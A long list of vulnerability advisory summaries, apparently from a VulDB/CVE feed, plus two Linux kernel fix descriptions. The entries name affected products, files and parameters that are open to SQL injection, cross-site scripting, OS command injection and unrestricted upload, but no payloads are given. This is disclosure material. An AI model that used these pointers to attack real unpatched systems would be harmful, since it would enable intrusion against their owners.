A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys&amp;cmd=___S_O_S_T_R_E_A_MAX___. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260573 was assigned to this vulnerability.
A vulnerability has been found in Tianwell Fire Intelligent Command Platform 1.1.1.1 and classified as critical. This vulnerability affects unknown code of the file /mfsNotice/page of the component API Interface. The manipulation of the argument gsdwid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260572.
A vulnerability, which was classified as critical, was found in Campcodes House Rental Management System 1.0. This affects an unknown part of the file ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260571.
A vulnerability was found in Campcodes House Rental Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_payment.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260485 was assigned to this vulnerability.
A vulnerability was found in Campcodes House Rental Management System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_tenant.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260484.
A vulnerability was found in Campcodes House Rental Management System 1.0 and classified as critical. This issue affects some unknown processing of the file view_payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260483.
A vulnerability has been found in SourceCodester Computer Laboratory Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-260482 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in PHPGurukul Small CRM 3.0. Affected by this issue is some unknown functionality of the component Registration Page. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260480.
A vulnerability classified as critical was found in PHPGurukul Small CRM 3.0. Affected by this vulnerability is an unknown functionality of the component Change Password Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260479.
A vulnerability classified as problematic has been found in Zhejiang Land Zongheng Network Technology O2OA up to 20240403. Affected is an unknown function of the file /x_portal_assemble_surface/jaxrs/portal/list?v=8.2.3-4-43f4fe3. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-260478 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
In the Linux kernel, the following vulnerability has been resolved: iommu/arm-smmu: Use the correct type in nvidia_smmu_context_fault() This was missed because of the function pointer indirection. nvidia_smmu_context_fault() is also installed as a irq function, and the 'void *' was changed to a struct arm_smmu_domain. Since the iommu_domain is embedded at a non-zero offset this causes nvidia_smmu_context_fault() to miscompute the offset. Fixup the types. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000120 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=0000000107c9f000 [0000000000000120] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: CPU: 1 PID: 47 Comm: kworker/u25:0 Not tainted 6.9.0-0.rc7.58.eln136.aarch64 #1 Hardware name: Unknown NVIDIA Jetson Orin NX/NVIDIA Jetson Orin NX, BIOS 3.1-32827747 03/19/2023 Workqueue: events_unbound deferred_probe_work_func pstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : nvidia_smmu_context_fault+0x1c/0x158 lr : __free_irq+0x1d4/0x2e8 sp : ffff80008044b6f0 x29: ffff80008044b6f0 x28: ffff000080a60b18 x27: ffffd32b5172e970 x26: 0000000000000000 x25: ffff0000802f5aac x24: ffff0000802f5a30 x23: ffff0000802f5b60 x22: 0000000000000057 x21: 0000000000000000 x20: ffff0000802f5a00 x19: ffff000087d4cd80 x18: ffffffffffffffff x17: 6234362066666666 x16: 6630303078302d30 x15: ffff00008156d888 x14: 0000000000000000 x13: ffff0000801db910 x12: ffff00008156d6d0 x11: 0000000000000003 x10: ffff0000801db918 x9 : ffffd32b50f94d9c x8 : 1fffe0001032fda1 x7 : ffff00008197ed00 x6 : 000000000000000f x5 : 000000000000010e x4 : 000000000000010e x3 : 0000000000000000 x2 : ffffd32b51720cd8 x1 : ffff000087e6f700 x0 : 0000000000000057 Call trace: nvidia_smmu_context_fault+0x1c/0x158 __free_irq+0x1d4/0x2e8 free_irq+0x3c/0x80 devm_free_irq+0x64/0xa8 arm_smmu_domain_free+0xc4/0x158 iommu_domain_free+0x44/0xa0 iommu_deinit_device+0xd0/0xf8 __iommu_group_remove_device+0xcc/0xe0 iommu_bus_notifier+0x64/0xa8 notifier_call_chain+0x78/0x148 blocking_notifier_call_chain+0x4c/0x90 bus_notify+0x44/0x70 device_del+0x264/0x3e8 pci_remove_bus_device+0x84/0x120 pci_remove_root_bus+0x5c/0xc0 dw_pcie_host_deinit+0x38/0xe0 tegra_pcie_config_rp+0xc0/0x1f0 tegra_pcie_dw_probe+0x34c/0x700 platform_probe+0x70/0xe8 really_probe+0xc8/0x3a0 __driver_probe_device+0x84/0x160 driver_probe_device+0x44/0x130 __device_attach_driver+0xc4/0x170 bus_for_each_drv+0x90/0x100 __device_attach+0xa8/0x1c8 device_initial_probe+0x1c/0x30 bus_probe_device+0xb0/0xc0 deferred_probe_work_func+0xbc/0x120 process_one_work+0x194/0x490 worker_thread+0x284/0x3b0 kthread+0xf4/0x108 ret_from_fork+0x10/0x20 Code: a9b97bfd 910003fd a9025bf5 f85a0035 (b94122a1)
A vulnerability was found in Xiamen Four-Faith RMP Router Management Platform 5.2.2. It has been declared as critical. This vulnerability affects unknown code of the file /Device/Device/GetDeviceInfoList?deviceCode=&amp;searchField=&amp;deviceState=. The manipulation of the argument groupId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260476. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in bihell Dice 3.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260474 is the identifier assigned to this vulnerability.
A vulnerability has been found in DedeCMS 5.7.112-UTF8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file update_guide.php. The manipulation of the argument files leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260473 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in DedeCMS 5.7.112-UTF8. Affected is an unknown function of the file stepselect_main.php. The manipulation of the argument ids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260472. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. It has been classified as critical. This affects an unknown part of the file /control/register_case.php. The manipulation of the argument title/case_no/client_name/court/case_type/case_stage/legel_acts/description/filling_date/hearing_date/opposite_lawyer/total_fees/unpaid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260277 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /control/adds.php. The manipulation of the argument name/gender/dob/email/mobile/address leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260276.
A vulnerability has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /control/addcase_stage.php. The manipulation of the argument cname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260275.
A vulnerability, which was classified as critical, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected is an unknown function of the file /control/activate_case.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-260274 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This issue affects some unknown processing of the file /control/deactivate_case.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260273 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Warehouse Management System 1.0. This vulnerability affects unknown code of the file pengguna.php. The manipulation of the argument admin_user/admin_nama/admin_alamat/admin_telepon leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260272.
A vulnerability classified as problematic has been found in SourceCodester Warehouse Management System 1.0. This affects an unknown part of the file customer.php. The manipulation of the argument nama_customer/alamat_customer/notelp_customer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260271.
A vulnerability was found in SourceCodester Warehouse Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file supplier.php. The manipulation of the argument nama_supplier/alamat_supplier/notelp_supplier leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260270 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Warehouse Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file barang.php. The manipulation of the argument nama_barang/merek leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260269 was assigned to this vulnerability.
In the Linux kernel, the following vulnerability has been resolved: idpf: fix kernel panic on unknown packet types In the very rare case where a packet type is unknown to the driver, idpf_rx_process_skb_fields would return early without calling eth_type_trans to set the skb protocol / the network layer handler. This is especially problematic if tcpdump is running when such a packet is received, i.e. it would cause a kernel panic. Instead, call eth_type_trans for every single packet, even when the packet type is unknown.
A vulnerability classified as problematic was found in Campcodes Church Management System 1.0. This vulnerability affects unknown code of the file /admin/add_visitor.php. The manipulation of the argument mobile leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259912.
A vulnerability classified as problematic has been found in Campcodes Church Management System 1.0. This affects an unknown part of the file /admin/admin_user.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259911.
A vulnerability was found in Campcodes Church Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/add_sundaysch.php. The manipulation of the argument Gender leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259910 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Church Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/addgiving.php. The manipulation of the argument amount leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259909 was assigned to this vulnerability.
A vulnerability was found in Campcodes Church Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/addTithes.php. The manipulation of the argument na leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259908.
A vulnerability was found in Campcodes Church Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/admin_user.php. The manipulation of the argument firstname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259907.
A vulnerability has been found in Campcodes Church Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/delete_log.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259906 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Church Management System 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259905 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Church Management System 1.0. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259904.
A vulnerability classified as problematic was found in Campcodes Complete Online Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file academic_year_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259903.
A vulnerability classified as problematic has been found in Campcodes Complete Online Student Management System 1.0. Affected is an unknown function of the file attendance_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259902 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file courses_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259901 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file Marks_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259900.
A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been classified as problematic. This affects an unknown part of the file students_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259899.
A vulnerability was found in Campcodes Complete Online Student Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file units_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259898 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Online Event Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259897 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Campcodes Online Event Management System 1.0. Affected is an unknown function of the file /views/index.php. The manipulation of the argument msg leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259896.
A vulnerability, which was classified as problematic, has been found in Campcodes Online Event Management System 1.0. This issue affects some unknown processing of the file /views/process.php. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259895.
A vulnerability classified as critical was found in Campcodes Online Event Management System 1.0. This vulnerability affects unknown code of the file /views/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259894 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Online Event Management System 1.0. This affects an unknown part of the file /api/process.php. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259893 was assigned to this vulnerability.
A vulnerability was found in Byzoro Smart S80 Management Platform up to 20240317. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Laundry Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /karyawan/edit. The manipulation of the argument karyawan leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259744.
A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /admin/add_ikev2.php. The manipulation of the argument TunnelId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259714 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /admin/config_ISCGroupNoCache.php. The manipulation of the argument GroupId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259713 was assigned to this vulnerability.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/config_Anticrack.php. The manipulation of the argument GroupId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259712.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add_postlogin.php. The manipulation of the argument SingleLoginId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259711.
A vulnerability was found in SourceCodester Laundry Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /karyawan/laporan_filter. The manipulation of the argument data_karyawan leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259702 is the identifier assigned to this vulnerability.
A vulnerability was found in Wangshen SecGate 3600 up to 20240408. It has been classified as critical. This affects an unknown part of the file /?g=net_pro_keyword_import_save. The manipulation of the argument reqfile leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259701 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Prison Management System 1.0. This vulnerability affects unknown code of the file /Employee/apply_leave.php. The manipulation of the argument txtstart_date/txtend_date leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259696.
A vulnerability classified as critical has been found in SourceCodester Prison Management System 1.0. This affects an unknown part of the file /Employee/delete_leave.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259695.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Employee/edit-profile.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259694 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /Admin/edit_profile.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259693 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /Account/login.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259692.
A vulnerability was found in SourceCodester Prison Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /Admin/login.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259691.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /Admin/add-admin.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259631.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Admin/edit-photo.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259630 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in CP Plus Wi-Fi Camera up to 20240401. Affected by this vulnerability is an unknown functionality of the component User Management. The manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259615. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in PuneethReddyHC Event Management 1.0. Affected is an unknown function of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to cross site scripting. It is possible to launch the attack remotely. VDB-259614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PuneethReddyHC Event Management 1.0. It has been rated as critical. This issue affects some unknown processing of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259613 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in EyouCMS 1.6.5. It has been declared as critical. This vulnerability affects unknown code of the file /login.php?m=admin&amp;c=Field&amp;a=channel_edit of the component Backend. The manipulation of the argument channel_id leads to deserialization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259612. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in QKSMS up to 3.9.4 on Android. It has been classified as problematic. This affects an unknown part of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259611. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Online Courseware 1.0 and classified as problematic. This vulnerability affects unknown code of the file edit.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259600.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Courseware 1.0. This affects an unknown part of the file addq.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259599.
A vulnerability, which was classified as problematic, has been found in SourceCodester Online Courseware 1.0. Affected by this issue is some unknown functionality of the file editt.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259598 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. Affected by this vulnerability is an unknown functionality of the file admin/activateall.php. The manipulation of the argument selector leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259597 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Courseware 1.0. Affected is an unknown function of the file admin/listscore.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259596.
A vulnerability was found in SourceCodester Online Courseware 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/activateteach.php. The manipulation of the argument selector leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259595.
A vulnerability was found in SourceCodester Online Courseware 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/activatestud.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259594 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Courseware 1.0. It has been classified as critical. This affects an unknown part of the file admin/deactivatestud.php. The manipulation of the argument selector leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259593 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Courseware 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/saveedit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259592.
A vulnerability has been found in SourceCodester Online Courseware 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/edit.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259591.
A vulnerability, which was classified as critical, was found in SourceCodester Online Courseware 1.0. Affected is an unknown function of the file admin/deactivateteach.php. The manipulation of the argument selector leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259590 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Courseware 1.0. This issue affects some unknown processing of the file admin/saveeditt.php. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259589 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. This vulnerability affects unknown code of the file admin/editt.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259588.
A vulnerability was found in SourceCodester Human Resource Information System 1.0. It has been classified as problematic. Affected is an unknown function of the file Superadmin_Dashboard/process/addbranches_process.php. The manipulation of the argument branches_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259584.
A vulnerability was found in SourceCodester Human Resource Information System 1.0 and classified as problematic. This issue affects some unknown processing of the file Superadmin_Dashboard/process/addcorporate_process.php. The manipulation of the argument corporate_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259583.
A vulnerability has been found in SourceCodester Human Resource Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file initialize/login_process.php. The manipulation of the argument hr_email/hr_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259582 is the identifier assigned to this vulnerability.
A vulnerability has been found in iboss Secure Web Gateway up to 10.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login of the component Login Portal. The manipulation of the argument redirectUrl leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259501 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Computer Laboratory Management System 1.0. This vulnerability affects unknown code of the file /classes/SystemSettings.php?f=update_settings. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259498 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Computer Laboratory Management System 1.0. This affects an unknown part of the file config.php. The manipulation of the argument url leads to execution after redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259497 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in code-projects Car Rental 1.0. Affected by this issue is some unknown functionality of the file add-vehicle.php. The manipulation of the argument Upload Image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259490 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Library System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/users/controller.php. The manipulation of the argument user_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259469 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Library System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file admin/books/index.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259468.
A vulnerability was found in SourceCodester Online Library System 1.0. It has been classified as critical. This affects an unknown part of the file admin/borrowed/index.php. The manipulation of the argument BookPublisher/BookTitle leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259467.
A vulnerability was found in SourceCodester Online Library System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/books/controller.php. The manipulation of the argument IBSN leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259466 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Library System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/books/deweydecimal.php. The manipulation of the argument category leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259465 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Library System 1.0. Affected is an unknown function of the file admin/books/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259464.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Library System 1.0. This issue affects some unknown processing of the file admin/login.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259463.
A vulnerability classified as problematic was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument to leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259462 is the identifier assigned to this vulnerability.
